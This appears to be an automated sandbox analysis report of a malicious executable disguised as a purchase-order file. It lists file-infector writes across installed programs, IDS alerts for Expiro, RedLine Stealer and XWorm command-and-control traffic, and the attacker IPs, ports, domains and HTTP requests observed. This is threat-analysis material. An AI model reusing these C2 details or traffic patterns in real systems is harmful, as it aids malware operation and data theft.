Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	System file written: C:\Windows\System32\alg.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe			Jump to behavior

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,		0_2_0046445A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,		0_2_0046C6D1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,		0_2_0046C75C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,		0_2_0046EF95
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,		0_2_0046F0F2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,		0_2_0046F3F3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,		0_2_004637EF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,		0_2_00463B12
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,		0_2_0046BCBC

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe			Jump to behavior

Software Vulnerabilities

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		6_2_06B886C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06B8C5F0h		6_2_06B8C0F8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06B8A0BBh		6_2_06B89DF8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06B88022h		6_2_06B87D60
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 06B89195h		6_2_06B88DB8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 07233A83h		6_2_07233850

Networking

Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.6:51901 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49695 -> 72.52.178.23:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49692 -> 204.10.161.147:7082
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49692 -> 204.10.161.147:7082
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 204.10.161.147:7082 -> 192.168.2.6:49692
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.6:49714 -> 54.169.144.97:80
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49713 -> 204.10.161.147:7081
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 204.10.161.147:7081 -> 192.168.2.6:49713
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49713 -> 204.10.161.147:7081
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 204.10.161.147:7081 -> 192.168.2.6:49713
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 204.10.161.147:7082 -> 192.168.2.6:49692
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.6:52381 -> 1.1.1.1:53

Source: Malware configuration extractor	URLs: 204.10.161.147
Source: Malware configuration extractor	URLs: 204.10.161.147:7082

Source: global traffic

TCP traffic: 204.10.161.147 ports 7082,7081,0,2,7,8

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Source: unknown

Network traffic detected: DNS query count 43

Source: global traffic

TCP traffic: 192.168.2.6:49692 -> 204.10.161.147:7082

Source: Joe Sandbox View	IP Address: 13.248.148.254 13.248.148.254
Source: Joe Sandbox View	IP Address: 165.160.15.20 165.160.15.20

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.6:49714
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.6:49714
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.6:49690
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.6:49690
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.6:49694
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.6:49721
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.6:49694
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.6:49726
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.6:49721
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.6:49726
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.6:49729
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.6:49729
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.6:49723
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.6:49723
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.6:49731
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.6:49731
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.6:49727
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.6:49727
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.6:49720
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.6:49720

Source: global traffic	HTTP traffic detected: POST /g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fuutkfqprp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cpfjcmisuekk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bkii HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jejtv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /vi?usid=25&utid=9811636311 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /kcj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 848
Source: global traffic	HTTP traffic detected: POST /vffaaftj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 848
Source: global traffic	HTTP traffic detected: POST /qshyvlcbk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ytgnoen HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yuftm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vbty HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /poihsqpaasbgdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /poihsqpaasbgdl?usid=25&utid=9811652355 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /qddngkni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fkqpqfhdsudwov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /garcaqlmbvibrae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yxfxsqq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jhmncdsktepa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mdggmdcnbmek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /veg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
